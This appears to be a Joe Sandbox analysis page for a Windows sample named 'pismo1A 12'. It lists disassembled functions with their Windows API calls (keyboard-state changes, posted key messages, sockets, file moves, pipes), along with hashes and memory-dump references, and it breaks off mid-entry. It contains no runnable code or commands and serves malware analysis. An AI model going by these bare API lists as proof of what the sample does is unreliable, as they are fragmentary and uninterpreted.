Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 562dbea45ba3720b32106ed05d119fbb03117ef5bdc4d022f46278852cb80c52
Instruction ID: 5af64caa691d1c780f31e34b272149469f4f245caaf63240a0c6be01b7eabebf
Opcode Fuzzy Hash: 562dbea45ba3720b32106ed05d119fbb03117ef5bdc4d022f46278852cb80c52
Instruction Fuzzy Hash: 2051A2A0A047D6BDFB368334C84ABBA7EE95B06304F088689E1D9954C2D3DDE9C4D751

Function 0070ACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 0070AD19
GetKeyboardState.USER32(?), ref: 0070AD2E
SetKeyboardState.USER32(?), ref: 0070AD8F
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0070ADBB
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0070ADD8
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0070AE17
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0070AE38

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: bbf24b6ab80b1705db1f14724aaeffbcd4678d2b9f969c13a15c6e35449f7dd4
Instruction ID: 345acf2d2f74b8651942f5a3dc7ab91e1c2cd0cc49bfa87746b1b1390eda0b59
Opcode Fuzzy Hash: bbf24b6ab80b1705db1f14724aaeffbcd4678d2b9f969c13a15c6e35449f7dd4
Instruction Fuzzy Hash: 4451F7A16047D5BDFB338334CC56B7A7ED86B46300F088689E1D5968C3D29CEC84D752

Function 006D542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(006E3CD6,?,?,?,?,?,?,?,?,006D5BA3,?,?,006E3CD6,?,?), ref: 006D5470
__fassign.LIBCMT ref: 006D54EB
__fassign.LIBCMT ref: 006D5506
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,006E3CD6,00000005,00000000,00000000), ref: 006D552C
WriteFile.KERNEL32(?,006E3CD6,00000000,006D5BA3,00000000,?,?,?,?,?,?,?,?,?,006D5BA3,?), ref: 006D554B
WriteFile.KERNEL32(?,?,00000001,006D5BA3,00000000,?,?,?,?,?,?,?,?,?,006D5BA3,?), ref: 006D5584

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 1f1c9bb40a2e63211fbfca2685581d01184dfe4484dd49998e0e1bf380629c8d
Instruction ID: 759ec3d598dfe65c3ad4ded032a45f4138b2588563cd040cc8e747528efee185
Opcode Fuzzy Hash: 1f1c9bb40a2e63211fbfca2685581d01184dfe4484dd49998e0e1bf380629c8d
Instruction Fuzzy Hash: C651B3B0D006499FDB11CFA8D845AEEBBFAEF08300F14415BE556E7391D7309A41CB65

Function 007210B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0072304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0072307A
Part of subcall function 0072304E: _wcslen.LIBCMT ref: 0072309B

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00721112
WSAGetLastError.WSOCK32 ref: 00721121
WSAGetLastError.WSOCK32 ref: 007211C9
closesocket.WSOCK32(00000000), ref: 007211F9

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
String ID:
API String ID: 2675159561-0
Opcode ID: 6ae594c1e3409d2b775c7461588f2d98b90439a5b099fb24fb77ec991209e64f
Instruction ID: 8adc47329c5d5c59a927bfc6424079651e1060218b62abe84e53a533798ca9e9
Opcode Fuzzy Hash: 6ae594c1e3409d2b775c7461588f2d98b90439a5b099fb24fb77ec991209e64f
Instruction Fuzzy Hash: 02410531600218AFEB109F24D884BAAB7EAFF45324F148059FD05AB291C778EE41CBE5

Function 0070CF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0070DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0070CF22,?), ref: 0070DDFD

Part of subcall function 0070DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0070CF22,?), ref: 0070DE16

lstrcmpiW.KERNEL32(?,?), ref: 0070CF45
MoveFileW.KERNEL32(?,?), ref: 0070CF7F
_wcslen.LIBCMT ref: 0070D005
_wcslen.LIBCMT ref: 0070D01B
SHFileOperationW.SHELL32(?), ref: 0070D061

Strings

\*.*, xrefs: 0070CFF3

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
String ID: \*.*
API String ID: 3164238972-1173974218
Opcode ID: 0a28f837ca6770343e408c3ca723e2339cb08341862870c98050181298ad7180
Instruction ID: c13e68fd87053f4d8a7eaaa549f85896c476a52fc288dc65f71b8621323c325a
Opcode Fuzzy Hash: 0a28f837ca6770343e408c3ca723e2339cb08341862870c98050181298ad7180
Instruction Fuzzy Hash: C34167B2905219DEDF13EBA4C981EDE77F9AF08340F1001EAE505EB181EA38AA44CB55

Function 00732DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00732E1C
GetWindowLongW.USER32(00000000,000000F0), ref: 00732E4F
GetWindowLongW.USER32(00000000,000000F0), ref: 00732E84
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00732EB6
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00732EE0
GetWindowLongW.USER32(00000000,000000F0), ref: 00732EF1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00732F0B

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 8c6d17dc958f42e2cf9ebbc6e55f6a79d041fe3382acef8e9bf7f1e8905e551a
Instruction ID: 76db978d6e769c84067033f324c9ee14d6fbff4cbc8a2148b6f0e9aa67095b33
Opcode Fuzzy Hash: 8c6d17dc958f42e2cf9ebbc6e55f6a79d041fe3382acef8e9bf7f1e8905e551a
Instruction Fuzzy Hash: 99311731684150DFEB21CF18DC8AF6537E0EB4A751F1541A4FA049B2B3CB79A842DB45

Function 00707726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00707769
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0070778F
SysAllocString.OLEAUT32(00000000), ref: 00707792
SysAllocString.OLEAUT32(?), ref: 007077B0
SysFreeString.OLEAUT32(?), ref: 007077B9
StringFromGUID2.OLE32(?,?,00000028), ref: 007077DE
SysAllocString.OLEAUT32(?), ref: 007077EC

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 47958177c88f96d9596f4c0790025c459118825c8e2e5c503ebef5addff02efa
Instruction ID: a6928a013bee1aee457e16a0ed4330ed4b4b0f351dfada62be0ffc17531d0ad5
Opcode Fuzzy Hash: 47958177c88f96d9596f4c0790025c459118825c8e2e5c503ebef5addff02efa
Instruction Fuzzy Hash: 6621B076A04219AFEB14DFA8CC88CBB77ECEB093A47008125FA04DB1A0D678EC41C764

Function 007077FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00707842
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00707868
SysAllocString.OLEAUT32(00000000), ref: 0070786B
SysAllocString.OLEAUT32 ref: 0070788C
SysFreeString.OLEAUT32 ref: 00707895
StringFromGUID2.OLE32(?,?,00000028), ref: 007078AF
SysAllocString.OLEAUT32(?), ref: 007078BD

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 2e364d0544fd8a76703125f97f7749334ee3b94454a8210f5d40dfc95665da40
Instruction ID: 7cd648e3d8cf3b33a522bfb6e4e216e582d084012d02953b53b93b2bcc2e807a
Opcode Fuzzy Hash: 2e364d0544fd8a76703125f97f7749334ee3b94454a8210f5d40dfc95665da40
Instruction Fuzzy Hash: 04216272A04214EFEB149FA8DC88DAA77ECEB09760710C125F915DB2E1D678EC41CB68

Function 007104D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 007104F2
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0071052E

Strings

nul, xrefs: 00710567

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: fddf2355c5058bce4486b9952db17387d516fa23ac733b0d0dfb1c519947d7f3
Instruction ID: 5f04e9a20080c1ec9dcfeb4dbcf02e13dc6bc6cf77c1bdd166513f94d98461c3
Opcode Fuzzy Hash: fddf2355c5058bce4486b9952db17387d516fa23ac733b0d0dfb1c519947d7f3
Instruction Fuzzy Hash: BD217C71500305ABDB209F2DD848E9A7BA5BF44724F204A19F8A1E62E0D7B499E0CFA0

Function 007105A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 007105C6
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00710601

Strings

nul, xrefs: 00710639

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: dfbfad0468ffc6e8bcc520c3e816463e8ae478d258f1554e5d9c7b105aa299ae
Instruction ID: cdc5b89cfc07720f88b4c32979d691bceb091cd3394304172d78b494e3893902
Opcode Fuzzy Hash: dfbfad0468ffc6e8bcc520c3e816463e8ae478d258f1554e5d9c7b105aa299ae
Instruction Fuzzy Hash: 692181755003059BDB209F6D8C08ADAB7E4BF95720F204A19F8A1E72E0D7F498E0CBA4

Function 007340AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 006A600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 006A604C
Part of subcall function 006A600E: GetStockObject.GDI32(00000011), ref: 006A6060
Part of subcall function 006A600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 006A606A

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00734112
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0073411F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0073412A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00734139
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00734145

Strings

Msctls_Progress32, xrefs: 007340E3

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 3b67930b96aad6c048eced31f2c3a8eb16204ed3e19d8b3fcf056ee4ae68246a
Instruction ID: e5897f150d34c940104e9483c438d16bfd265cfff8e7a658432f03a8aa321854
Opcode Fuzzy Hash: 3b67930b96aad6c048eced31f2c3a8eb16204ed3e19d8b3fcf056ee4ae68246a
Instruction Fuzzy Hash: A811B2B214021DBEFF119F64CC86EE77F9DEF09798F014111FA18A2050CA769C61DBA4

Function 006DD7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 006DD7A3: _free.LIBCMT ref: 006DD7CC

_free.LIBCMT ref: 006DD82D

Part of subcall function 006D29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,006DD7D1,00000000,00000000,00000000,00000000,?,006DD7F8,00000000,00000007,00000000,?,006DDBF5,00000000), ref: 006D29DE
Part of subcall function 006D29C8: GetLastError.KERNEL32(00000000,?,006DD7D1,00000000,00000000,00000000,00000000,?,006DD7F8,00000000,00000007,00000000,?,006DDBF5,00000000,00000000), ref: 006D29F0

_free.LIBCMT ref: 006DD838
_free.LIBCMT ref: 006DD843
_free.LIBCMT ref: 006DD897
_free.LIBCMT ref: 006DD8A2
_free.LIBCMT ref: 006DD8AD
_free.LIBCMT ref: 006DD8B8

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction ID: ae1737402aa4f2e1c42d28d22f158373e10cff8cb4e5ac7750636e3560ccc2c7
Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction Fuzzy Hash: 2F115171D40B04AAD5A1BFB1CC57FCB7BDE6F10700F40082EB29DAA292DA65F5055654

Function 0070DA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0070DA74
LoadStringW.USER32(00000000), ref: 0070DA7B
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0070DA91
LoadStringW.USER32(00000000), ref: 0070DA98
MessageBoxW.USER32(00000000,?,?,00011010), ref: 0070DADC

Strings

%s (%d) : ==> %s: %s %s, xrefs: 0070DAB9

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: 906dca424b36607cd39f02499c6253d79990df22a7b7ab38104c5c07f05be353
Instruction ID: 32f1d5f5e915cb5b907f9210c162172224690028935f5a7afc2b83e10af9664a
Opcode Fuzzy Hash: 906dca424b36607cd39f02499c6253d79990df22a7b7ab38104c5c07f05be353
Instruction Fuzzy Hash: 2E0186F2500208BFF7119BE09D89EE7376CE708702F408595B706F2081EA789E844F79

Function 0071096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(0112E118,0112E118), ref: 0071097B
EnterCriticalSection.KERNEL32(0112E0F8,00000000), ref: 0071098D
TerminateThread.KERNEL32(00000000,000001F6), ref: 0071099B
WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 007109A9
CloseHandle.KERNEL32(00000000), ref: 007109B8
InterlockedExchange.KERNEL32(0112E118,000001F6), ref: 007109C8
LeaveCriticalSection.KERNEL32(0112E0F8), ref: 007109CF

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: e58bf839b264876abd9a234e37eb554efc8647ae7c98f27b9b397cde9b71ec3f
Instruction ID: 8c6b6f0de25a4443ce0867c9e17626147ee2b0c1d3b87b96bc7c6fec7de5cc56
Opcode Fuzzy Hash: e58bf839b264876abd9a234e37eb554efc8647ae7c98f27b9b397cde9b71ec3f
Instruction Fuzzy Hash: D2F0E131442512BBE7525F94EE8DBD67B35FF05703F405015F101608A1C7B9A4B5CF94

Function 00721C60 Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00721DC0
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00721DE1
WSAGetLastError.WSOCK32 ref: 00721DF2
htons.WSOCK32(?,?,?,?,?), ref: 00721EDB
inet_ntoa.WSOCK32(?), ref: 00721E8C

Part of subcall function 007039E8: _strlen.LIBCMT ref: 007039F2

Part of subcall function 00723224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,0071EC0C), ref: 00723240

_strlen.LIBCMT ref: 00721F35

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
String ID:
API String ID: 3203458085-0
Opcode ID: f915996f84fc1807119a07564580901301641cd32001a6be8636925fe6d8fcb2
Instruction ID: f0847b8f905e44355049ebc4cccfeeeec4cd0dff6fdc49f977982c83b97d0294
Opcode Fuzzy Hash: f915996f84fc1807119a07564580901301641cd32001a6be8636925fe6d8fcb2
Instruction Fuzzy Hash: 82B11370604310AFD324EF24D895E2A7BE6BF95318F94894CF4565B2E2CB35EE42CB91

Function 006D01B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 006D00BA
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006D00D6
__allrem.LIBCMT ref: 006D00ED
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006D010B
__allrem.LIBCMT ref: 006D0122
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006D0140

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction ID: 789a52e1028e7f1ce8ce85cde3e47e64e10823ee33a71b96b7d7798503dec9e1
Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction Fuzzy Hash: 0481C072E00706ABE720AF69CC41BAA73EBEF41364F25452FF561DA381E770D9018B94

Function 006D61FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,006C82D9,006C82D9,?,?,?,006D644F,00000001,00000001,8BE85006), ref: 006D6258
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,006D644F,00000001,00000001,8BE85006,?,?,?), ref: 006D62DE
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 006D63D8
__freea.LIBCMT ref: 006D63E5

